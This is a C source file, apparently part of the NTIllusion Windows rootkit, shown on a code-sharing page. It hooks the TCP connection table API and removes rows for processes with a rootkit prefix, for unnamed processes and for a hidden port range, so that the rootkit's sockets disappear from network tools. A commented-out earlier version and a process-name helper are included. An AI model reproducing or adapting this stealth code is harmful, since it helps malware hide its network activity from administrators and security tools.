📄 kntinethide.c
字号:
DWORD flags)
{
FARPROC fhtons;
HINSTANCE hDll, hDll2;
DWORD err=0, i=0, j=0; // error handler, TcpTable walk index, TcpTable sort index
char psname[512]; // process name
u_long LocalPort=0, RemotePort=0;
OutputString("[!!] AllocateAndGetTcpExTableFromStack \n");
hDll = LoadLibrary("wsock32.dll");
if(!hDll)
{
OutputString("[!] !hDll\n");
return 0;
}
fhtons = (FARPROC) fGetProcAddress(hDll, "htons");
if(!fhtons)
{
OutputString("[!] CANNOT FIND ADDRESS FOR : htons() \n");
return 0;
}
OutputString("[!!] 2\n");
// Get real address using GetProcAddress because the function may not have been hijacked at IAT
// level but using GetProcAddress()
hDll2 = LoadLibrary( "iphlpapi.dll");
if(!hDll2)
{
OutputString("[!] !hDll2\n");
return 0;
}
if(!fAllocateAndGetTcpExTableFromStack)
{
fAllocateAndGetTcpExTableFromStack = (FARPROC) fGetProcAddress( hDll2,
"AllocateAndGetTcpExTableFromStack" );
if(!fAllocateAndGetTcpExTableFromStack)
{
OutputString("[!!] Can't resolve AllocateAndGetTcpExTableFromStack (GetProcAddress)\n");
return 0;
}
}
OutputString("[!!] 3\n");
// Call genuine function ...
err = fAllocateAndGetTcpExTableFromStack(pTcpTable, bOrder, heap, zero, flags);
if(err)
{
ShowError();
//(*pTcpTable) = 0x00;
//FreeHeap(heap, );
/*
while(1)
{
Sleep(1000);
OutputString("loop() \n");
}
*/
// in the case of an error, return it
// permet de survivre, meme si on perdle contact, on filtre toujours
// appels entrelac閟 ??
return err;
}
OutputString("[!!] AllocateAndGetTcpExTableFromStack : checking ports\n");
//sprintf(tmp, "'%d'\n", ((*pTcpTable)->dwNumEntries));
//OutputString("[%d]\n", tmp);
//OutputString("[%d]\n", pTcpTable);
//((*pTcpTable)->dwNumEntries)
// ... and start to filter unwanted rows. This will hide all opened/listening/connected/closed/... sockets
// for each process...
for(i = 0; i < ((*pTcpTable)->dwNumEntries); j=i)
{
OutputString("# AllocateAndGetTcpExTableFromStack loop i=%d\n", i);
//memset(psname, 0, 512);
GetProcessNamebyPid((*pTcpTable)->table[i].dwProcessId, (char*)psname);
LocalPort = (u_short) fhtons((u_short)(*pTcpTable)->table[i].dwLocalPort);
RemotePort = (u_short) fhtons((u_short)(*pTcpTable)->table[i].dwRemotePort);
OutputString("# AllocateAndGetTcpExTableFromStack %s %d<=>%d\n", (char*)psname, LocalPort, RemotePort);
if( !_strnicmp((char*)psname, RTK_FILE_CHAR, strlen(RTK_FILE_CHAR)) // RTK_FILE_CHAR prefix : hidden process ?
|| !_strnicmp((char*)psname, NTILLUSION_PROCESS_NOTFOUND, strlen(NTILLUSION_PROCESS_NOTFOUND)) // process not found ?
|| (( LocalPort >= RTK_PORT_HIDE_MIN) && ( LocalPort <= RTK_PORT_HIDE_MAX)) //local port is in hidden range ?
|| ((RemotePort >= RTK_PORT_HIDE_MIN) && (RemotePort <= RTK_PORT_HIDE_MAX)) ) //remote port is in hidden range ?
{
//if(VERBOSE_STEALTH)
OutputString("[!] hidden :\n");
OutputString("[!] NTIllusion made a TCP socket hidden for process %s (%d)\n", (char*)psname, (*pTcpTable)->table[i].dwProcessId);
// we move all rows left one position lower in TcpTable array (8=>7, 7=>6, 6=>5 ...)
// this leads to the wipe of the row that contains a "hidden process"
for(j=i; j<((*pTcpTable)->dwNumEntries); j++){
memcpy( (&((*pTcpTable)->table[j])), (&((*pTcpTable)->table[j+1])),sizeof(MIB_TCPEXROWEx));
}
// clear last row
memset( (&((*pTcpTable)->table[(((*pTcpTable)->dwNumEntries)-1)])), 0, sizeof(MIB_TCPEXROWEx));
((*pTcpTable)->dwNumEntries)-=1; // decrease number of rows by one
// do the job again for the current row, that may also contain a hidden process
continue;
}
// this row was ok, jump to the next
i++;
}
// We may free the x skipped & unused TCP rows (x=(GenuineNumberOfRows-((*pTcpTable)->dwNumEntries)))
// that begin at TcpTable index number ((*pTcpTable)->dwNumEntries)-1)
return err;
}
/*
DWORD WINAPI MyAllocateAndGetTcpExTableFromStack(
PMIB_TCPEXTABLE *pTcpTable, // buffer for the connection table
BOOL bOrder, // sort the table?
HANDLE heap,
DWORD zero,
DWORD flags)
{
FARPROC fhtons;
HINSTANCE hDll, hDll2;
DWORD err=0, i=0, j=0; // error handler, TcpTable walk index, TcpTable sort index
char psname[512]; // process name
char tmp[512];
u_long LocalPort=0, RemotePort=0;
OutputString("[!!] AllocateAndGetTcpExTableFromStack \n");
hDll = LoadLibrary("wsock32.dll");
if(!hDll)
{
OutputString("[!] !hDll\n");
return 0;
}
fhtons = (FARPROC) GetProcAddress(hDll, "htons");
if(!fhtons)
{
OutputString("[!] CANNOT FIND ADDRESS FOR : htons() \n");
return 0;
}
OutputString("[!!] 2\n");
// Get real address using GetProcAddress because the function may not have been hijacked at IAT
// level but using GetProcAddress()
hDll2 = LoadLibrary( "iphlpapi.dll");
if(!hDll2)
{
OutputString("[!] !hDll2\n");
return 0;
}
if(!fAllocateAndGetTcpExTableFromStack)
{
fAllocateAndGetTcpExTableFromStack = (FARPROC) GetProcAddress( hDll2,
"AllocateAndGetTcpExTableFromStack" );
if(!fAllocateAndGetTcpExTableFromStack)
{
OutputString("[!!] Can't resolve AllocateAndGetTcpExTableFromStack (GetProcAddress)\n");
return 0;
}
}
OutputString("[!!] 3\n");
// Call genuine function ...
err = fAllocateAndGetTcpExTableFromStack(pTcpTable, bOrder, heap, zero, flags);
OutputString("[!!] 4\n");
if(err)
{
OutputString("[ERROR] exiting (fAllocateAndGetTcpExTableFromStack() returned an error)\n");
return err; // on the case of an error, return it
}
OutputString("[!!] 5 (err=%d, lasterror=%d)\n", err, GetLastError());
// ... and start to filter unwanted rows. This will hide all opened/listening/connected/closed/... sockets
// for every process whose name is starting by RTK_PROCESS_CHAR
for(i = 0; i < (*pTcpTable)->dwNumEntries; j=i) {
OutputString("[!!] i=%d\n", i);
memset(psname, 0, 512);
GetProcessNamebyPid((*pTcpTable)->table[i].dwProcessId, (char*)psname);
if(( strstr((char*)psname, "_nti")!=0))
{
// we move all rows left one position lower in TcpTable array (8=>7, 7=>6, 6=>5 ...)
// this leads to the wipe of the row that contains a "hidden process"
for(j=i; j<((*pTcpTable)->dwNumEntries); j++){
memcpy( (&((*pTcpTable)->table[j])), (&((*pTcpTable)->table[j+1])),sizeof(MIB_TCPEXROW));
}
// clear last row
memset( (&((*pTcpTable)->table[(((*pTcpTable)->dwNumEntries)-1)])), 0, sizeof(MIB_TCPEXROW));
((*pTcpTable)->dwNumEntries)-=1; // decrease number of rows by one
// do the job again for the current row, that may also contain a hidden process
continue;
}
// this row was ok, jump to the next
i++;
}
// We may free the x skipped & unused TCP rows (x=(GenuineNumberOfRows-((*pTcpTable)->dwNumEntries)))
// that begin at TcpTable index number ((*pTcpTable)->dwNumEntries)-1)
return err;
}
*/
// GetProcessNamebyPid: kInject remixed
// There is a problem when a process tries to get the real name of "hidden" process
// by using its PID and the Toolhelp32 functions. This is probably caused by the fact
// that theses functions rely on a hijacked version of NtQuerySystemInformation. (Theses
// functions doesn't use GetProcAddress to retrieve its real address)
// So any unknown process must be considered as a hidden process.
int GetProcessNamebyPid(DWORD pId, char* name)
{
HINSTANCE hLib;
PROCESSENTRY32 PEntry;
HANDLE hTool32;
//Functions pointers :
FARPROC fCreateToolhelp32Snapshot;
FARPROC fProcess32First;
FARPROC fProcess32Next;
strcpy(name, (char*)NTILLUSION_PROCESS_NOTFOUND);
hLib = LoadLibrary("Kernel32.DLL");
//Functions addresses :
fCreateToolhelp32Snapshot = (FARPROC) GetProcAddress( hLib,"CreateToolhelp32Snapshot");
fProcess32First = (FARPROC) GetProcAddress( hLib, "Process32First" );
fProcess32Next = (FARPROC) GetProcAddress( hLib, "Process32Next" );
PEntry.dwSize = sizeof(PROCESSENTRY32); //Set Size of structure before use
hTool32 = (HANDLE)fCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //Create SnapShot
fProcess32First(hTool32, &PEntry); //Get first process
if(PEntry.th32ProcessID == pId){
strcpy(name, PEntry.szExeFile);
return 1;
}
while( fProcess32Next(hTool32,&PEntry) )
{
if(PEntry.th32ProcessID == pId){
strcpy(name, PEntry.szExeFile);
return 1;
}
}
if(PEntry.th32ProcessID == pId){
strcpy(name, PEntry.szExeFile);
return 1;
}
FreeLibrary(hLib);
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -